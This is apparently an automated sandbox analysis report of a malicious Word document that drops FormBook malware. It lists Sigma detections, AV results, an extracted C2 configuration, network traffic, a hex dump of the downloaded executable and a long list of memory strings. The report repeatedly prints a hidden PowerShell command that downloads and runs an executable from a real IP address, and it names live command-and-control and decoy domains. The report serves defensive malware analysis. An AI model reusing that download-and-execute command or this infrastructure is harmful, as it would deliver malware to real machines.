Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h Start-BitsTransfer -Source 'http://31.210.20.45/1xBet/RFL_0769002.exe' -Destination 'C:\Users\Public\Documents\nothinglittle.exe';C:\Users\Public\Documents\nothinglittle.exe, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h Start-BitsTransfer -Source 'http://31.210.20.45/1xBet/RFL_0769002.exe' -Destination 'C:\Users\Public\Documents\nothinglittle.exe';C:\Users\Public\Documents\nothinglittle.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE, ParentProcessId: 3664, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h Start-BitsTransfer -Source 'http://31.210.20.45/1xBet/RFL_0769002.exe' -Destination 'C:\Users\Public\Documents\nothinglittle.exe';C:\Users\Public\Documents\nothinglittle.exe, ProcessId: 4220

Sigma detected: Non Interactive PowerShell

Show sources

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h Start-BitsTransfer -Source 'http://31.210.20.45/1xBet/RFL_0769002.exe' -Destination 'C:\Users\Public\Documents\nothinglittle.exe';C:\Users\Public\Documents\nothinglittle.exe, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h Start-BitsTransfer -Source 'http://31.210.20.45/1xBet/RFL_0769002.exe' -Destination 'C:\Users\Public\Documents\nothinglittle.exe';C:\Users\Public\Documents\nothinglittle.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE, ParentProcessId: 3664, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h Start-BitsTransfer -Source 'http://31.210.20.45/1xBet/RFL_0769002.exe' -Destination 'C:\Users\Public\Documents\nothinglittle.exe';C:\Users\Public\Documents\nothinglittle.exe, ProcessId: 4220

Sigma detected: Suspicious Bitsadmin Job via PowerShell

Show sources

Source: Process started

Author: Endgame, JHasenbusch (ported to sigma for oscd.community): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h Start-BitsTransfer -Source 'http://31.210.20.45/1xBet/RFL_0769002.exe' -Destination 'C:\Users\Public\Documents\nothinglittle.exe';C:\Users\Public\Documents\nothinglittle.exe, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h Start-BitsTransfer -Source 'http://31.210.20.45/1xBet/RFL_0769002.exe' -Destination 'C:\Users\Public\Documents\nothinglittle.exe';C:\Users\Public\Documents\nothinglittle.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE, ParentProcessId: 3664, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h Start-BitsTransfer -Source 'http://31.210.20.45/1xBet/RFL_0769002.exe' -Destination 'C:\Users\Public\Documents\nothinglittle.exe';C:\Users\Public\Documents\nothinglittle.exe, ProcessId: 4220

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000009.00000002.434963811.000000000423B000.00000004.00000001.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.bucksnortneola.com/gw2/"], "decoy": ["kmampc.com", "swagsoldier.com", "achochapo.com", "nestymentemaestra.com", "rakuen-beans.info", "portaldainsolvencia.com", "nationaltodaytv.com", "monadiclab.com", "thebudgetfurnituredenver.com", "sifangzhouzi.com", "quangcaosonthach.com", "cbluebeltliveshop.com", "hyperrealmarketing.com", "dallasproducecompany.com", "zizhizhengshu.com", "becosyshe.com", "injectionhub.com", "wasteshelter.com", "gapegod.com", "danfrem.com", "emag.enterprises", "insomniaut.com", "margaretsboutiquenb.com", "bestmovies4k.com", "hsxytz.com", "veles.asia", "graphicoustic.com", "rzeroxi.com", "cristyleebennett.com", "vercoicsporno.club", "awdworldwide.com", "agrilast.com", "vineyardplaceseniorliving.com", "blancaholidaylets.com", "didixun.com", "localmiller.com", "gravityphysiotherapy.com", "couchtabledesktop.com", "cypresswoodsseniorliving.com", "mmdastro.com", "opportunitybsi.com", "deejspeaks.com", "alllivesmattertojesus.info", "clippingpathmask.com", "tuoitrechuatraisudoi.site", "mipecheritage.info", "acadeopolis.com", "52jnh.com", "thetrust.place", "highseachartersct.com", "booklarge.com", "kela-de.com", "ea-it-pantomath.com", "tricountyrr.com", "blackeye.online", "hidrovaco.com", "sleeplessreconnaissance.life", "newalbanyironworks.com", "scthxb.com", "bossssss.com", "isaostar.com", "pointredeem.com", "myfulfillmentproject.com", "toikawai.com"]}

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Metadefender: Detection: 20%			Perma Link
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	ReversingLabs: Detection: 55%

Multi AV Scanner detection for submitted file

Show sources

Source: RFL_PO 69002.doc	Virustotal: Detection: 15%			Perma Link
Source: RFL_PO 69002.doc	ReversingLabs: Detection: 21%

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000009.00000002.434963811.000000000423B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.435299783.00000000043A9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.432254547.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.491239075.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.492289476.00000000015C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.491687583.0000000000DD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000000.488383037.0000000006130000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.435204828.000000000430F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 9.2.nothinglittle.exe.423b160.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.nothinglittle.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.nothinglittle.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.nothinglittle.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.nothinglittle.exe.400000.0.unpack, type: UNPACKEDPE

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Show sources

Source: RFL_PO 69002.doc

Joe Sandbox ML: detected

Source: 28.0.nothinglittle.exe.400000.1.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 28.2.nothinglittle.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Source:	Binary string: wscui.pdbUGP source: explorer.exe, 0000001D.00000000.488460659.0000000006560000.00000002.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: nothinglittle.exe, 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: nothinglittle.exe
Source:	Binary string: wscui.pdb source: explorer.exe, 0000001D.00000000.488460659.0000000006560000.00000002.00000001.sdmp

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Source: winword.exe

Memory has grown: Private usage: 0MB later: 63MB

Source: C:\Users\Public\Documents\nothinglittle.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 4x nop then pop esi
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 4x nop then pop edi

Source: global traffic

TCP traffic: 192.168.2.3:49728 -> 31.210.20.45:80

Source: global traffic

TCP traffic: 192.168.2.3:49728 -> 31.210.20.45:80

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: www.bucksnortneola.com/gw2/

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 11 Jun 2021 05:41:48 GMTServer: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40Last-Modified: Thu, 10 Jun 2021 08:59:35 GMTETag: "823f0-5c4659c35de2e"Accept-Ranges: bytesContent-Length: 533488Keep-Alive: timeout=5, max=99Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5e 07 69 d6 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 b0 07 00 00 4a 00 00 00 00 00 00 de cf 07 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 88 cf 07 00 53 00 00 00 00 e0 07 00 e8 46 00 00 00 00 00 00 00 00 00 00 00 fc 07 00 f0 27 00 00 00 40 08 00 0c 00 00 00 6c cf 07 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e4 af 07 00 00 20 00 00 00 b0 07 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 e8 46 00 00 00 e0 07 00 00 48 00 00 00 b2 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 08 00 00 02 00 00 00 fa 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 cf 07 00 00 00 00 00 48 00 00 00 02 00 05 00 e0 b0 07 00 8c 1e 00 00 03 00 00 00 26 00 00 06 f8 2a 00 00 e8 85 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 28 31 00 00 06 2a 92 02 28 01 00 00 0a 28 02 00 00 0a 02 fe 06 03 00 00 06 73 03 00 00 0a 6f 04 00 00 0a 02 03 7d 01 00 00 04 2a 1b 30 02 00 46 00 00 00 01 00 00 11 28 05 00 00 0a 72 01 00 00 70 6f 06 00 00 0a 0a 73 07 00 00 0a 0b 06 07 6f 08 00 00 0a 28 02 00 00 0a 07 6f 09 00 00 0a 6f 0a 00 00 0a 0c de 14 07 2c 06 07 6f 0b 00 00 0a dc 06 2c 06 06 6f 0b 00 00 0a dc 08 2a 00 00 01 1c 00 00 02 00 16 00 1a 30 00 0a 00 00 00 00 02 00 10 00 2a 3a 00 0a 00 00 00 00 1a 7e 02 00 00 04 2a 1e 02 80 02 00 00 04 2a 00 13 30 02 00 27 00 00 00 02 00 00 11 1f 16 0a 2b 0e 20 e8 03 00 00 28 0c 00 00 0a 06 17 59 0a 06 2d ef 73 0d 00 00 0a 6f 0e 00 00 0a 02 7b 01 00 00 04 2a 06 2a 1e 02 28 01 00 00 0a 2a 1e 02 7b 03 00 00 04 2a 22 02 03 7d 03 00 00 04 2a 1e 02 7b 04 00 00 04 2a 22 02 03 7d 04 00 00 04 2a 3e 02 16 28 0e 00 00 06 02 16 28 10 00 00 06 2a 1e 02 7b 05 00 00 04 2a 22 02 03 7d 05

Source: Joe Sandbox View

ASN Name: PLUSSERVER-ASN1DE PLUSSERVER-ASN1DE

Source: global traffic

HTTP traffic detected: GET /1xBet/RFL_0769002.exe HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Thu, 10 Jun 2021 08:59:35 GMTUser-Agent: Microsoft BITS/7.8Host: 31.210.20.45

Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)

Source: explorer.exe, 0000001D.00000000.460487626.000000000E7C0000.00000002.00000001.sdmp	String found in binary or memory: http://%s.com
Source: RFL_PO 69002.doc	String found in binary or memory: http://31.210.20.45/1xBet/RFL_0769002.ex
Source: RFL_PO 69002.doc	String found in binary or memory: http://31.210.20.45/1xBet/RFL_0769002.ex9
Source: PowerShell_transcript.061544._jjnsaz8.20210611074123.txt.1.dr	String found in binary or memory: http://31.210.20.45/1xBet/RFL_0769002.exe
Source: powershell.exe, 00000001.00000002.281479605.00000000031D0000.00000004.00000040.sdmp, powershell.exe, 00000001.00000002.281688658.0000000004B10000.00000004.00000040.sdmp	String found in binary or memory: http://31.210.20.45/1xBet/RFL_0769002.exe-DestinationC:
Source: powershell.exe, 00000001.00000002.283225202.00000000050E1000.00000004.00000001.sdmp	String found in binary or memory: http://31.210.20.45/1xBet/RFL_0769002.exex
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 0000001D.00000000.460487626.000000000E7C0000.00000002.00000001.sdmp	String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: nothinglittle.exe.9.dr	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: nothinglittle.exe.9.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: nothinglittle.exe.9.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSAExtendedValidationCodeSigningCA.crl0
Source: explorer.exe, 0000001D.00000000.482617274.0000000004E61000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: nothinglittle.exe.9.dr	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: nothinglittle.exe.9.dr	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://find.joins.com/
Source: explorer.exe, 0000001D.00000000.458516222.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://fr.search.yahoo.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://home.altervista.org/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://images.monster.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://in.search.yahoo.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.dada.net/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.yahoo.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://jobsearch.monster.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://kr.search.yahoo.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://list.taobao.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&q=
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://mail.live.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://msk.afisha.ru/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: nothinglittle.exe.9.dr	String found in binary or memory: http://ocsp.comodoca.com0
Source: nothinglittle.exe.9.dr	String found in binary or memory: http://ocsp.comodoca.com0#
Source: nothinglittle.exe.9.dr	String found in binary or memory: http://ocsp.sectigo.com0
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: powershell.exe, 00000001.00000002.283225202.00000000050E1000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://price.ru/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://price.ru/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://recherche.linternaute.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://recherche.tf1.fr/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://rover.ebay.com
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://ru.search.yahoo.com
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://sads.myspace.com/
Source: powershell.exe, 00000001.00000002.282599228.0000000004FA1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search-dyn.tiscali.it/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.about.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.alice.it/
